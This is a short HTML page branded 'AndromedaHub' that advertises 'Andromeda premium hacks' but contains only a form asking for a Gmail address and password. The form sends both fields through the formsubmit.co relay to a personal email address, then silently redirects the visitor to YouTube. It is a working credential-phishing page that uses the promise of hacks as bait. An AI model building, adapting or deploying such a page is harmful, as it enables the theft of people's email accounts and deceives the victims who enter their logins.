<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>AndromedaHub</title>
    <link rel="icon" href="OIP.jpg" type="image/png">
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="all"><div class="main">
        <form action="https://formsubmit.co/tomas.narbutas8@gmail.com" method="POST">
        <div class="width"><h1>Andromeda premium hacks 💎💎💎</h1></div>
            <div class="width"><label for="gmail">Gmail:</label><input type="gmail" placeholder="Gmail" name="Gmail:"></div>
            <div class="width"><label for="password">Password:</label><input type="password" placeholder="Password" name="Password:" id=""></div>
            <div class="width"><input type="submit" class="submit"></div>
            <input type="hidden" name="_next" value="https://youtube.com">
        </form>
    </div></div>
</body>

</html> 

